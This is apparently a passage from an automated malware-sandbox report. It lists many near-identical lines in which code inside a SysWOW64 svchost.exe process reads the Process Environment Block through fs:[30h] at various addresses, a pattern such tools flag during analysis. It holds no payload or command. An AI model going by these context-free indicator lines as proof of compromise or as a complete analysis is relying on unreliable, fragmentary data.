Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]	3_2_03C5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C325E0 mov eax, dword ptr fs:[00000030h]	3_2_03C325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	3_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C5ED mov eax, dword ptr fs:[00000030h]	3_2_03C6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32582 mov eax, dword ptr fs:[00000030h]	3_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C32582 mov ecx, dword ptr fs:[00000030h]	3_2_03C32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64588 mov eax, dword ptr fs:[00000030h]	3_2_03C64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E59C mov eax, dword ptr fs:[00000030h]	3_2_03C6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	3_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	3_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB05A7 mov eax, dword ptr fs:[00000030h]	3_2_03CB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C545B1 mov eax, dword ptr fs:[00000030h]	3_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C545B1 mov eax, dword ptr fs:[00000030h]	3_2_03C545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38550 mov eax, dword ptr fs:[00000030h]	3_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38550 mov eax, dword ptr fs:[00000030h]	3_2_03C38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]	3_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]	3_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6656A mov eax, dword ptr fs:[00000030h]	3_2_03C6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6500 mov eax, dword ptr fs:[00000030h]	3_2_03CC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04500 mov eax, dword ptr fs:[00000030h]	3_2_03D04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40535 mov eax, dword ptr fs:[00000030h]	3_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E53E mov eax, dword ptr fs:[00000030h]	3_2_03C5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C304E5 mov ecx, dword ptr fs:[00000030h]	3_2_03C304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA49A mov eax, dword ptr fs:[00000030h]	3_2_03CEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C364AB mov eax, dword ptr fs:[00000030h]	3_2_03C364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C644B0 mov ecx, dword ptr fs:[00000030h]	3_2_03C644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]	3_2_03CBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6E443 mov eax, dword ptr fs:[00000030h]	3_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CEA456 mov eax, dword ptr fs:[00000030h]	3_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2645D mov eax, dword ptr fs:[00000030h]	3_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5245A mov eax, dword ptr fs:[00000030h]	3_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC460 mov ecx, dword ptr fs:[00000030h]	3_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]	3_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]	3_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5A470 mov eax, dword ptr fs:[00000030h]	3_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]	3_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]	3_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68402 mov eax, dword ptr fs:[00000030h]	3_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]	3_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]	3_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2E420 mov eax, dword ptr fs:[00000030h]	3_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2C427 mov eax, dword ptr fs:[00000030h]	3_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB6420 mov eax, dword ptr fs:[00000030h]	3_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6A430 mov eax, dword ptr fs:[00000030h]	3_2_03C6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]	3_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]	3_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C50BCB mov eax, dword ptr fs:[00000030h]	3_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]	3_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]	3_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30BCD mov eax, dword ptr fs:[00000030h]	3_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]	3_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	3_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	3_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38BF0 mov eax, dword ptr fs:[00000030h]	3_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EBFC mov eax, dword ptr fs:[00000030h]	3_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]	3_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40BBE mov eax, dword ptr fs:[00000030h]	3_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40BBE mov eax, dword ptr fs:[00000030h]	3_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	3_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]	3_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	3_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CE4B4B mov eax, dword ptr fs:[00000030h]	3_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D02B57 mov eax, dword ptr fs:[00000030h]	3_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	3_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC6B40 mov eax, dword ptr fs:[00000030h]	3_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFAB40 mov eax, dword ptr fs:[00000030h]	3_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD8B42 mov eax, dword ptr fs:[00000030h]	3_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28B50 mov eax, dword ptr fs:[00000030h]	3_2_03C28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDEB50 mov eax, dword ptr fs:[00000030h]	3_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C2CB7E mov eax, dword ptr fs:[00000030h]	3_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04B00 mov eax, dword ptr fs:[00000030h]	3_2_03D04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAEB1D mov eax, dword ptr fs:[00000030h]	3_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	3_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EB20 mov eax, dword ptr fs:[00000030h]	3_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	3_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CF8B28 mov eax, dword ptr fs:[00000030h]	3_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]	3_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]	3_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86ACC mov eax, dword ptr fs:[00000030h]	3_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30AD0 mov eax, dword ptr fs:[00000030h]	3_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	3_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C64AD0 mov eax, dword ptr fs:[00000030h]	3_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	3_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6AAEE mov eax, dword ptr fs:[00000030h]	3_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3EA80 mov eax, dword ptr fs:[00000030h]	3_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04A80 mov eax, dword ptr fs:[00000030h]	3_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C68A90 mov edx, dword ptr fs:[00000030h]	3_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	3_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C38AA0 mov eax, dword ptr fs:[00000030h]	3_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C86AA4 mov eax, dword ptr fs:[00000030h]	3_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C36A50 mov eax, dword ptr fs:[00000030h]	3_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40A5B mov eax, dword ptr fs:[00000030h]	3_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C40A5B mov eax, dword ptr fs:[00000030h]	3_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	3_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	3_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA6F mov eax, dword ptr fs:[00000030h]	3_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CDEA60 mov eax, dword ptr fs:[00000030h]	3_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CACA72 mov eax, dword ptr fs:[00000030h]	3_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CACA72 mov eax, dword ptr fs:[00000030h]	3_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBCA11 mov eax, dword ptr fs:[00000030h]	3_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA24 mov eax, dword ptr fs:[00000030h]	3_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5EA2E mov eax, dword ptr fs:[00000030h]	3_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C54A35 mov eax, dword ptr fs:[00000030h]	3_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C54A35 mov eax, dword ptr fs:[00000030h]	3_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6CA38 mov eax, dword ptr fs:[00000030h]	3_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC69C0 mov eax, dword ptr fs:[00000030h]	3_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C3A9D0 mov eax, dword ptr fs:[00000030h]	3_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C649D0 mov eax, dword ptr fs:[00000030h]	3_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA9D3 mov eax, dword ptr fs:[00000030h]	3_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBE9E0 mov eax, dword ptr fs:[00000030h]	3_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C629F9 mov eax, dword ptr fs:[00000030h]	3_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C629F9 mov eax, dword ptr fs:[00000030h]	3_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C429A0 mov eax, dword ptr fs:[00000030h]	3_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C309AD mov eax, dword ptr fs:[00000030h]	3_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C309AD mov eax, dword ptr fs:[00000030h]	3_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB89B3 mov esi, dword ptr fs:[00000030h]	3_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	3_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB89B3 mov eax, dword ptr fs:[00000030h]	3_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB0946 mov eax, dword ptr fs:[00000030h]	3_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D04940 mov eax, dword ptr fs:[00000030h]	3_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C56962 mov eax, dword ptr fs:[00000030h]	3_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7096E mov eax, dword ptr fs:[00000030h]	3_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7096E mov edx, dword ptr fs:[00000030h]	3_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C7096E mov eax, dword ptr fs:[00000030h]	3_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4978 mov eax, dword ptr fs:[00000030h]	3_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CD4978 mov eax, dword ptr fs:[00000030h]	3_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC97C mov eax, dword ptr fs:[00000030h]	3_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE908 mov eax, dword ptr fs:[00000030h]	3_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CAE908 mov eax, dword ptr fs:[00000030h]	3_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC912 mov eax, dword ptr fs:[00000030h]	3_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28918 mov eax, dword ptr fs:[00000030h]	3_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C28918 mov eax, dword ptr fs:[00000030h]	3_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CB892A mov eax, dword ptr fs:[00000030h]	3_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CC892B mov eax, dword ptr fs:[00000030h]	3_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]	3_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03D008C0 mov eax, dword ptr fs:[00000030h]	3_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]	3_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	3_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]	3_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03C30887 mov eax, dword ptr fs:[00000030h]	3_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_03CBC89D mov eax, dword ptr fs:[00000030h]	3_2_03CBC89D
